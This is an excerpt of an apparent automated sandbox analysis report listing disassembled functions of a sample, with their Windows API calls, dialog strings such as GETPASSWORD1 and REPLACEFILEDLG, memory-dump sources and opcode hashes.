                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ItemText$DialogWindow
                                                                                                                                                                          • String ID: ASKNEXTVOL
                                                                                                                                                                          • API String ID: 445417207-3402441367
                                                                                                                                                                          • Opcode ID: b3d3926ff646ec0757e8311bb0a6003d966d096be4bf57035bcffe82413f551a
                                                                                                                                                                          • Instruction ID: c971ef1c6128ddd823422d483f2c02fa80c1b516d1b2f59e93ce8b8018b31fe5
                                                                                                                                                                          • Opcode Fuzzy Hash: b3d3926ff646ec0757e8311bb0a6003d966d096be4bf57035bcffe82413f551a
                                                                                                                                                                          • Instruction Fuzzy Hash: 57118432241210BFD6119F6DAC45F6A77EDEB4AB42F3004A0F281EB5B0CB619945DB26
                                                                                                                                                                          Function 00B2D8EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __fprintf_l.LIBCMT ref: 00B2D954
                                                                                                                                                                          • _strncpy.LIBCMT ref: 00B2D99A
                                                                                                                                                                            • Part of subcall function 00B31DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00B61030,00000200,00B2D928,00000000,?,00000050,00B61030), ref: 00B31DC4
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                                                                                                                                          • String ID: $%s$@%s
                                                                                                                                                                          • API String ID: 562999700-834177443
                                                                                                                                                                          • Opcode ID: cf568a9413aa5072ad0cab2465eae954ed6f2ab1b6689df9ed14c537c1cba7f8
                                                                                                                                                                          • Instruction ID: 41a3752519c7674e738b426551414de84a1489c66978b8a7211823b855c92965
                                                                                                                                                                          • Opcode Fuzzy Hash: cf568a9413aa5072ad0cab2465eae954ed6f2ab1b6689df9ed14c537c1cba7f8
                                                                                                                                                                          • Instruction Fuzzy Hash: F521A232440258AEDB21EFA4DC45FDE7BECEF05700F1404A2F918962A2E372D688DB51
                                                                                                                                                                          Function 00B30E46 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00B2AC5A,00000008,?,00000000,?,00B2D22D,?,00000000), ref: 00B30E85
                                                                                                                                                                          • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00B2AC5A,00000008,?,00000000,?,00B2D22D,?,00000000), ref: 00B30E8F
                                                                                                                                                                          • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00B2AC5A,00000008,?,00000000,?,00B2D22D,?,00000000), ref: 00B30E9F
                                                                                                                                                                          Strings
                                                                                                                                                                          • Thread pool initialization failed., xrefs: 00B30EB7
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                                                                                                          • String ID: Thread pool initialization failed.
                                                                                                                                                                          • API String ID: 3340455307-2182114853
                                                                                                                                                                          • Opcode ID: 4081eeab95bd588ef75506187ab880ef7c825a359cfc1f1ccb142d0563bc3651
                                                                                                                                                                          • Instruction ID: b9cced3088181769e3660740b440044bca6f7f1cd3247bd7b242888a658e4045
                                                                                                                                                                          • Opcode Fuzzy Hash: 4081eeab95bd588ef75506187ab880ef7c825a359cfc1f1ccb142d0563bc3651
                                                                                                                                                                          • Instruction Fuzzy Hash: 4D118FB1B04718AFC3216F6ADC84AA7FBECEF58754F244C6EF1DA83200DA7159408B50
                                                                                                                                                                          Function 00B3B270 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00B21316: GetDlgItem.USER32(00000000,00003021), ref: 00B2135A
                                                                                                                                                                            • Part of subcall function 00B21316: SetWindowTextW.USER32(00000000,00B535F4), ref: 00B21370
                                                                                                                                                                          • EndDialog.USER32(?,00000001), ref: 00B3B2BE
                                                                                                                                                                          • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 00B3B2D6
                                                                                                                                                                          • SetDlgItemTextW.USER32(?,00000067,?), ref: 00B3B304
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ItemText$DialogWindow
                                                                                                                                                                          • String ID: GETPASSWORD1
                                                                                                                                                                          • API String ID: 445417207-3292211884
                                                                                                                                                                          • Opcode ID: 7df6efd8369ee01261a25a91acf1541ee594dd428a7ad728052580d1842c89f5
                                                                                                                                                                          • Instruction ID: d533d8600f0ed7c414456f5b08f83a78c8c4ed2075f3be0503893bc2f3851730
                                                                                                                                                                          • Opcode Fuzzy Hash: 7df6efd8369ee01261a25a91acf1541ee594dd428a7ad728052580d1842c89f5
                                                                                                                                                                          • Instruction Fuzzy Hash: 5D11083290012976DB219A64AC49FFF3BEDEF19B00F2001A0FB45B31D4CBB4990487A1
                                                                                                                                                                          Function 00B3DCDD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                                                                                                          • API String ID: 0-56093855
                                                                                                                                                                          • Opcode ID: e755642ef2f78a0f3461bed8e9636522e68e14bdbef2becca6fb13ebf3f76e61
                                                                                                                                                                          • Instruction ID: 01c3439f3800e9c7f6ebcadff74a196846b9fd001f4baa88a62eb98be8b593d1
                                                                                                                                                                          • Opcode Fuzzy Hash: e755642ef2f78a0f3461bed8e9636522e68e14bdbef2becca6fb13ebf3f76e61
                                                                                                                                                                          • Instruction Fuzzy Hash: 11017176604245BFDB118F68FC44A567BE8F708754F2404B5F805932B0CE719890DBA1
                                                                                                                                                                          Function 00B49A1E Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: __alldvrm$_strrchr
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1036877536-0
                                                                                                                                                                          • Opcode ID: 15e7b98f52cb345e5770fd34cbf54b95dbf5428e1727e1497290f0e3bad33655
                                                                                                                                                                          • Instruction ID: e62405a2fad92499849838df8a25f85402d2b9ebbb2cea397dd4b7be3b275207
                                                                                                                                                                          • Opcode Fuzzy Hash: 15e7b98f52cb345e5770fd34cbf54b95dbf5428e1727e1497290f0e3bad33655
                                                                                                                                                                          • Instruction Fuzzy Hash: 77A13572A043869FEB25CF28C8D17AFBBE5EF55310F2841EDE4959B282C2348E41E751
                                                                                                                                                                          Function 00B2A354 Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00B27F69,?,?,?), ref: 00B2A3FA
                                                                                                                                                                          • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00B27F69,?), ref: 00B2A43E
                                                                                                                                                                          • SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00B27F69,?,?,?,?,?,?,?), ref: 00B2A4BF
                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,00000800,?,00B27F69,?,?,?,?,?,?,?,?,?,?), ref: 00B2A4C6
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$Create$CloseHandleTime
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2287278272-0
                                                                                                                                                                          • Opcode ID: 50922afac69187a03e96de161937dfc41d99ead013fba1695f72251f0967aa2e
                                                                                                                                                                          • Instruction ID: ac08e6249911d75050508eaca3c06e0c2ca3be8f422a2e2b76bb842082853170
                                                                                                                                                                          • Opcode Fuzzy Hash: 50922afac69187a03e96de161937dfc41d99ead013fba1695f72251f0967aa2e
                                                                                                                                                                          • Instruction Fuzzy Hash: 4D41C231148391ABD721EF24EC45F9EBBE89B84700F04099DB5E9D32C0D6A4EA4CDB53
                                                                                                                                                                          Function 00B21100 Relevance: 6.1, APIs: 4, Instructions: 119COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _wcslen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 176396367-0
                                                                                                                                                                          • Opcode ID: 170d1c4bb662d9adcc05e5ca1280216f32f19f614b3bc5430d0752be8d20e93b
                                                                                                                                                                          • Instruction ID: 7312921d15f5aa7c41d0b82fd50a8d88c1c4ab9d5afe975c01e449530fc1b15f
                                                                                                                                                                          • Opcode Fuzzy Hash: 170d1c4bb662d9adcc05e5ca1280216f32f19f614b3bc5430d0752be8d20e93b
                                                                                                                                                                          • Instruction Fuzzy Hash: 0F41C3719006699BCB21AF68DC4AAEF7BF8EF10710F040459FD4AF7255DE30AE448BA4
                                                                                                                                                                          Function 00B4C988 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00B491E0,?,00000000,?,00000001,?,?,00000001,00B491E0,?), ref: 00B4C9D5
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00B4CA5E
                                                                                                                                                                          • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00B46CBE,?), ref: 00B4CA70
                                                                                                                                                                          • __freea.LIBCMT ref: 00B4CA79
                                                                                                                                                                            • Part of subcall function 00B48E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00B4CA2C,00000000,?,00B46CBE,?,00000008,?,00B491E0,?,?,?), ref: 00B48E38
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2652629310-0
                                                                                                                                                                          • Opcode ID: 12e22158318f6187d46eeba8f7ca6df0c0a102f4617e198a529d12955f5b4cfd
                                                                                                                                                                          • Instruction ID: e83ae283b2dfa53e8e4d7fb9dd4de2c153a66e6d78d1cafeed3f4c689cb94429
                                                                                                                                                                          • Opcode Fuzzy Hash: 12e22158318f6187d46eeba8f7ca6df0c0a102f4617e198a529d12955f5b4cfd
                                                                                                                                                                          • Instruction Fuzzy Hash: 2231A072A0221AABDF25DF64CC41EAE7BE5EB01B50F1441A8FC04E7254EB35CE50DB90
                                                                                                                                                                          Function 00B3A663 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetDC.USER32(00000000), ref: 00B3A666
                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 00B3A675
                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B3A683
                                                                                                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 00B3A691
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CapsDevice$Release
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1035833867-0
                                                                                                                                                                          • Opcode ID: 2a6298413276d18e5e05702dd3fef037f3d254bd75601f1d3c73299f9705674a
                                                                                                                                                                          • Instruction ID: 4849ba8f4d4108f00c5df60f4210346e6a796f8cc036e2637abb78d3270c0ea6
                                                                                                                                                                          • Opcode Fuzzy Hash: 2a6298413276d18e5e05702dd3fef037f3d254bd75601f1d3c73299f9705674a
                                                                                                                                                                          • Instruction Fuzzy Hash: F5E01231942721B7D3615B61BC0EF8B3E94EB05F52F010201FA05AB2F0DFB98600CBA1
                                                                                                                                                                          Function 00B3A80C Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 237COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00B3A699: GetDC.USER32(00000000), ref: 00B3A69D
                                                                                                                                                                            • Part of subcall function 00B3A699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00B3A6A8
                                                                                                                                                                            • Part of subcall function 00B3A699: ReleaseDC.USER32(00000000,00000000), ref: 00B3A6B3
                                                                                                                                                                          • GetObjectW.GDI32(?,00000018,?), ref: 00B3A83C
                                                                                                                                                                            • Part of subcall function 00B3AAC9: GetDC.USER32(00000000), ref: 00B3AAD2
                                                                                                                                                                            • Part of subcall function 00B3AAC9: GetObjectW.GDI32(?,00000018,?), ref: 00B3AB01
                                                                                                                                                                            • Part of subcall function 00B3AAC9: ReleaseDC.USER32(00000000,?), ref: 00B3AB99
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ObjectRelease$CapsDevice
                                                                                                                                                                          • String ID: (
                                                                                                                                                                          • API String ID: 1061551593-3887548279
                                                                                                                                                                          • Opcode ID: 26f687a4fa60b9ce5c1dbe5971fb8b4eaae1c085a5be5a16e60d014deb7d1058
                                                                                                                                                                          • Instruction ID: 9204c4350efda6f8c40deecf59557973412c81c8aa60f619cd47df39554c61b6
                                                                                                                                                                          • Opcode Fuzzy Hash: 26f687a4fa60b9ce5c1dbe5971fb8b4eaae1c085a5be5a16e60d014deb7d1058
                                                                                                                                                                          • Instruction Fuzzy Hash: 3C91F371204740AFD610DF25C884A2BBBE8FFC8B01F10499EF59AD3260DB71A905CF62
                                                                                                                                                                          Function 00B275DE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137timeCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog.LIBCMT ref: 00B275E3
                                                                                                                                                                            • Part of subcall function 00B305DA: _wcslen.LIBCMT ref: 00B305E0
                                                                                                                                                                            • Part of subcall function 00B2A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00B2A598
                                                                                                                                                                          • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00B2777F
                                                                                                                                                                            • Part of subcall function 00B2A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00B2A325,?,?,?,00B2A175,?,00000001,00000000,?,?), ref: 00B2A501
                                                                                                                                                                            • Part of subcall function 00B2A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00B2A325,?,?,?,00B2A175,?,00000001,00000000,?,?), ref: 00B2A532
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$Attributes$CloseFindH_prologTime_wcslen
                                                                                                                                                                          • String ID: :
                                                                                                                                                                          • API String ID: 3226429890-336475711
                                                                                                                                                                          • Opcode ID: 76eae5780390d9a52f8fbdd2f7906e23d4304e91628427c250b46120f604e327
                                                                                                                                                                          • Instruction ID: 810671894a0cdc75f5c07b5a343092af58201379a97cc5b878569c5ce6b91e86
                                                                                                                                                                          • Opcode Fuzzy Hash: 76eae5780390d9a52f8fbdd2f7906e23d4304e91628427c250b46120f604e327
                                                                                                                                                                          • Instruction Fuzzy Hash: 1E418371901268AAEB21EB64EC95EDEB3FDEF55300F0040D6B60DA2092DB745F89CB61
                                                                                                                                                                          Function 00B3B48E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
